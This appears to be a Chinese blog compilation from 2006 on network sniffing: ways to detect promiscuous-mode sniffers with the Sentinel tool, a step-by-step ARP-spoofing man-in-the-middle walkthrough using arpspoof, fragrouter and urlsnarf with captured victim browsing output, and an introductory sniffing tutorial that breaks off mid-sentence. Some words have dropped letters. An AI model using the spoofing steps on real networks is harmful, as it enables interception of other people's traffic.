这种方法是采用发送一个ARP请求，其中包含所有正确信息除了伪造的目标主机MAC硬件地址给我们的目标主机，这样如果目标主机没有处于杂乱模式，它将不会理睬这些信息包，因为这些信息包其认为不是指定给它们的，所以不会进行响应和回复，但如果此目标机器处于杂乱模式，ARP请求就会发生并进行内核处理，通过机器的回应信息我们就可以知道其处于杂乱模式。这种方法结合内核的特性来查看机器的运作状态，请看下面的Etherping 测试模式。 　　-- DNS测试模式： 　　DNS测试主要是针对网络数据收集工具能执行IP到名字反转解析来提供DNS名字来代替IP地址（The DNS test operate o the remise that many attacker etwork data gathering tool erform IP to ame inverse resolutio to rovide DNS ame i lace of IP addre es）。在执行反转查询中，工具会从被动网络工具 模式转变为主动网络工具，而那些没有监视网络书记的工具就不会去解析信息包中的IP地址。利用这种信息，ANTI SNIFFER工具可以自身在本地主机中变为杂乱模式并在我们网络中发送无数个伪造的主机，这样，ANTI SNIFFER 工具就可以嗅探DNS请求来查看目标是否在请求解析那些不存在主机。 　　--Etherping 测试模式： 　　Etherping 测试模式依赖于目标主机的内核，也就所谓的内核测试。在通常情况下，硬件网络接口卡过滤和丢弃那些MAC地址不同于自己机器上的MAC地址的信息包或者不是广播Ethernet 地址的地址。就是说信息包是正确和实际的Ethernet地址或者是广播Ethernet地址，接口就会把这些地址COPY和传递给内核进行进一步处理。 　　但某些系统假定包含在以太帧中的数据包含某个目标主机中正确的IP地址或者广播地址，但具有不同于本地主机的MAC地址，当NIC设置为杂乱模式，发送给目标主机的每个数据包它还是傻傻的传递给操作系统进行分析。这样通过发送包含正确IP地址和不正确MAC地址的ICMP ECHO包给要检测的主机，如果目标主机回应了我们的请求，我们就知道其处于杂乱模式了。 　　多种LINUX内核存在这种问题，其中NETBSD也可以利用这个问题来检测杂乱模式，但需要使用广播地址的信息包，这种信息包使用带伪造ether帧的IP地址，如66:66:66:66:66:66. 　　关于WINDOWS95，98，NT的操作系统在杂乱模式中确实是检查信息包ETHER地址的，如果信息包的NIC ETHER地址符合本地主机就让堆栈来处理。但WINDOWS对广播的ether信息包存在问题，在普通环境下，如机器不在杂乱模式下，NIC只把含有起本身MAC地址的信息包或者ether地址是ff:ff:ff:ff:ff:ff传递给内核。但当在杂乱模式中驱动程序是检查ETHER地址，但它只检查ETHER地址的第一个八未组是否为Oxff就来判断信息包是否为广播或者其他，因此如果我们建立一个包含EHTER地址为ff:00:00:00:00:00的IP正确的信息包并发送给目标机器，如果其进行了响应的回应，就表示起处于杂乱模式。 　　 但对WINDOWS的这种方法是依赖于所用的驱动程序的，默认的微软驱动程序有此特性并且大多数供应商的驱动程序也有此特性，但某些NIC过滤广播只是依靠第一个八为组，所以这些卡不适合此方法。 　　--网络和机器的反应时间测试（也可以说ICMP PING反应时间）： 　　这种模式是比较有效的测试方法，依据是靠对操作系统的影响来测试。但其中的坏处就是这些测试会在短期内产生一些多数量的网络通信。 　　这些测试假定当网络卡不处于杂乱模式时提供硬件过滤，这样的话，信息包不是指定给本身机器的将被网络卡丢弃。当在这中情况下，在网络通信信息量将动态增长对操作系统的影响很小，相反的处于杂乱状态的机器由于不 对这层进行过滤，就把这些信息传递给系统或者用户模式进行过滤，会对操作系统产生比较大的影响。简单的说，我们先正常情况下PING一机器，再我们构建很多伪造的TCP连接来ping程序来ping目标，并且注意RTT(round tri time)，这样处于杂乱模式的机器由于会处理这些垃圾信息包，并影响系统并导致网络反映时间增加，然后来比较各个RTT，经过多次测试和人工判断就能决定目标机器上是否存在SNIFFER。 　　Sentinel是根据这些方法来进行测试的程序，是有源代码形式发放的。使用于OPENBSD 2.6 ；FREEBSD 3.X；NETBSD 1.4.1；LINUX2.2.X平台。 　　编译后使用方法为： 　　#./sentinel -t 192.168.0.1 -a 是ARP测试。 　　#./sentinel -t 192.168.0.1 -e 是etherping test 　　#./sentinel -t 192.168.0.1 -f 1.1.1.1 -d 是DNS测试； 　　#./sentinel -t 192.168.0.1 -f 1.1.1.1 -d -a -e 是允许所有模式进行测试。
2006-08-14 18:18
(分类:
通常在局域网环境中，我们都是通过交换环境的网关上网的，在交换环境中使用NetXray或者NAISniffer一类的嗅探工具除了抓到自己的包以外，是不能看到其他主机的网络通信的。
但是我们可以通过利用ARP欺骗可以实现Sniffer的目的。
ARP协议是将IP解析为MAC地址的协议，局域网中的通信都是基于MAC的。
例如下面这样的情况：
在局域网中192.168.0.24和192.168.0.29都是通过网关192.168.0.1上网的，假定攻击者的系统为192.168.0.24，他希望听到192.168.0.29的通信，那么我们就可以利用ARP欺骗实现。
1、首先告诉192.168.0.29，网关192.168.0.1的MAC地址是192.168.0.24
2、告诉192.168.0.1，192.168.0.29的MAC地址是192.168.0.24。
这样192.168.0.29和192.168.0.1之间的数据包，就会发给192.168.0.24，也就是攻击者的机器，这样就可以听到会话了。但是这么做的有一个问题，192.168.0.29发现自己不能上网了，因为原来发给192.168.0.1的数据包都被192.168.0.24接收了，而并没有发给网关192.168.0.1。
这时候192.168.0.24设置一个包转发的东西就可以解决这个问题了，也就是从192.168.0.29收到的包转发给192.168.0.1，在把从192.168.0.1收到的包发给192.168.0.29。这样192.168.0.29根本就不会意识到自己被***了。
具体实现：
1、欺骗192.168.0.29，告诉这台机器网关192.168.0.1的MAC地址是自己(192.168.0.24)。
[root@Linuxd iff-2.3]#./ar oof-ieth0-t192.168.0.29192.168.0.1
0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71
0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71
0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71
0:50:56:40:7:710:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:50:56:40:7:71
0:0:21:0:0:180:0:86:61:6b:4e080642:arpreply192.168.0.1is-at0:0:21:0:0:18
………………………………..
这时候对192.168.0.29的ARP欺骗就开始了。
2、欺骗192.168.0.1，告诉网关192.168.0.29的MAC地址是自己(192.168.0.24)。
[root@Linuxd iff-2.3]#./ar oof-ieth0-t192.168.0.1192.168.0.29
0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71
0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71
0:50:56:40:7:710:0:21:0:0:18080642:arpreply192.168.0.29is-at0:50:56:40:7:71
0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e
0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e
0:0:86:61:6b:4e0:0:21:0:0:18080642:arpreply192.168.0.29is-at0:0:86:61:6b:4e
其实在这个时候192.168.0.29是可以发现的自己被欺骗了。在CMD下面使用ARP–a命令：
C:/WINNTarp-a
Interface:192.168.0.29onInterface0x1000003
InternetAddre PhysicalAddre Type
192.168.0.100-50-56-40-07-71dynamic
192.168.0.2400-50-56-40-07-71dynamic
两个IP地址的MAC地址居然是一模一样的！不过很少有人会这么做:-)。
3、设置一个包转发
[root@Linuxfragrouter-1.6]#./fragrouter-B1
fragrouter:base-1:normalIPforwarding
在这之前别忘了首先需要打开包转发的功能
[root@Linux/proc]#echo1/proc/sys/net/ipv4/ip_forward
万事具备，可以开始SNIFFER了。
例如想看看192.168.0.29在浏览什么地方：
[root@Linuxd iff-2.3]#./url arf
url arf:listeningoneth0[tc ort80orport8080orport3128]
Kitty[18/May/2002:20:02:25+1100]"GEThttp://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&am index=7HTTP/1.1"--"http://www.google.com/search?hl=zh-CN&am ie=UTF8&am oe=UTF8&am q=fdfd am tnG=Google%E6%90%9C%E7%B4%A2&am lr=""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"
Kitty--[18/May/2002:20:02:28+1100]"GEThttp://www.ezboard.com/ztyles/default.c HTTP/1.1"--"http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&am index=7""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"
Kitty--[18/May/2002:20:02:29+1100]"GEThttp://www1.ezboard.com/ ch.js?customerid=1147458082HTTP/1.1"--"http://pub72.ezboard.com/flasile15596frm1.showAddReplyScreenFromWeb?topicID=29.topic&am index=7""Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.0)"
当然也可以知道其他………:-)
2006-08-14 18:16
(分类:
一 前言
　　SNIFF真是一个古老的话题，关于在网络上采用SNIFF来获取敏感信息已经不是什么新鲜事，也不乏很多成功的案例，那么，SNIFF究竟是什么呢？SNIFF就是嗅探器，就是***，SNIFF静悄悄的工作在网络的底层，把你的秘密全部记录下来。看过威尔史密斯演的《全民公敌》吗？SNIFF就象里面精巧的***一样，让你防不胜防。
　　SNIFF可以是软件，也可以是硬件，既然是软件那就要分平台，有WINDOWS下的、UNXI下的等，硬件的SNIFF称为网络分析仪，反正不管硬件软件，目标只有一个，就是获取在网络上传输的各种信息。本文仅仅介绍软件的SNIFF。
　　当你舒适的坐在家里，惬意的享受网络给你带来的便利，收取你的EMAIL，购买你喜欢的物品的时候，你是否会想到你的朋友给你的信件，你的信用卡帐号变成了一个又一个的信息包在网络上不停的传送着，你是否曾经这些信息包会通过网络流入别人的机器呢？你的担忧不是没有道理的，因为SNIFF可以让你的担忧变成实实在在的危险。就好象一个人躲在你身后偷看一样。。。。。。
　　二 网络基础知识
　　“网络基础知识”，是不是听起来有点跑题了？虽然听起来这和我们要谈的SNIFF没什么关系，可是还是要说一说的，万丈高楼平地起，如果连地基都没打好，怎么盖楼？！如果你对网络还不是十分清楚的话，最好能静下心来好好看看，要知道，这是基础的基础，在这里我只是简单的说一下，免得到时候有人迷糊，详细的最好能够自己去找书看看。
　　（1）TCP/IP体系结构
　　开放系统互连（OSI）模型将网络划分为七层模型，分别用以在各层上实现不同的功能，这七层分别为：应用层、表示层、会话层、传输层、网络层、数据链路层及物理层。而TCP/IP体系也同样遵循这七层标准，只不过在某些OSI功能上进行了压缩，将表示层及会话层合并入应用层中，所以实际上我们打交道的TCP/IP仅仅有5层而已，网络上的分层结构决定了在各层上的协议分布及功能实现，从而决定了各层上网络设备的使用。实际上很多成功的系统都是基于OSI模型的，如：如帧中继、ATM、ISDN等。
　　TCP/IP的网络体系结构（部分）
　　　
　　从上面的图中我们可以看出，第一层物理层和第二层数据链路层是TCP/IP的基础，而TCP/IP本身并不十分关心低层，因为处在数据链路层的网络设备驱动程序将上层的协议和实际的物理接口隔离开来。网络设备驱动程序位于介质访问子层(MAC)　（2）网络上的设备　 　 　 　 　中继器：中继器的主要功能是终结一个网段的信号并在另一个网段再生该信号，一句话，就是简单的放大而已，工作在物理层上。　　　
　　网 桥：网桥使用MAC物理地址实现中继功能，可以用来分隔网段或连接部分异种网络，工作在数据链路层。
　　路由器：路由器使用网络层地址(IP,X.121,E.164等)，主要负责数据包的路由寻径，也能处理物理层和数据链路层上的工作。
　　网 关：主要工作在网络第四层以上，主要实现收敛功能及协议转换，不过很多时候网关都被用来描述任何网络互连设备。
　　（3）TCP/IP与以太网
　　以太网和TCP/IP可以说是相互相成的，可以说两者的关系几乎是密不可分，以太网在一二层提供物理上的连线，而TCP/IP工作在上层，使用32位的IP地址，以太网则使用48位的MAC地址，两者间使用ARP和RARP协议进行相互转换。从我们上面TCP/IP的模型图中可以清楚的看到两者的关系。
　　载波***/冲突检测(CSMA/CD)技术被普遍的使用在以太网中，所谓载波***是指在以太网中的每个站点都具有同等的权利，在传输自己的数据时，首先***信道是否空闲，如果空闲，就传输自己的数据，如果信道被占用，就等待信道空闲。而冲突检测则是为了防止发生两个站点同时监测到网络没有被使用时而产生冲突。以太网采用广播机制，所有与网络连接的工作站都可以看到网络上传递的数据。
　　为了加深你的理解，我们来看看下面的图，一个典型的在以太网中客户与服务器使用TCP/IP协议的通信
　　以太网
　　??唆唆了这么多，有人烦了吧？相信我，这是基础的基础，可以说是说得是很简单拉，如果需要，拿出个几十万字来说上面的内容，我想也不嫌多，好了，让我们进入下一节， iff的原理。
　　三 SNIFF的原理
　　　要知道在以太网中，所有的通讯都是广播的，也就是说通常在同一个网段的所有网络接口都可以访问在物理媒体上传输的所有数据，而每一个网络接口都有一个唯一的硬件地址，这个硬件地址也就是网卡的MAC地址，大多数系统使用48比特的地址，这个地址用来表示网络中的每一个设备，一般来说每一块网卡上的MFC地址都是不同的，每个网卡厂家得到一段地址，然后用这段地址分配给其生产的每个网卡一个地址。在硬件地址和IP地址间使用ARP和RARP协议进行相互转换。
　　在正常的情况下，一个网络接口应该只响应这样的两种数据帧：
　　 1.与自己硬件地址相匹配的数据帧。　 　　 　　　　 　　 　　　2.发向所有机器的广播数据帧。
　　　在一个实际的系统中，数据的收发是由网卡来完成的，网卡接收到传输来的数据，网卡内的单片程序接收数据帧的目的MAC地址，根据计算机上的网卡驱动程序设置的接收模式判断该不该接收，认为该接收就接收后产生中断信号通知CPU，认为不该接收就丢掉不管，所以不该接收的数据网卡就截断了，计算机根本就不知道。CPU得到中断信号产生中断，操作系统就根据网卡的驱动程序设置的网卡中断程序地址调用驱动程序接收数据，驱动程序接收数据后放入信号堆栈让操作系统处理。而对于网卡来说一般有四种接收模式：
　　广播方式：该模式下的网卡能够接收网络中的广播信息。　　　　
　　组播方式：设置在该模式下的网卡能够接收组播数据。 　　
　　直接方式：在这种模式下，只有目的网卡才能接收该数据。 　　　　　混杂模式：在这种模式下的网卡能够接收一切通过它的数据，而不管该数据是否是传给它的。
　　好了，现在我们总结一下，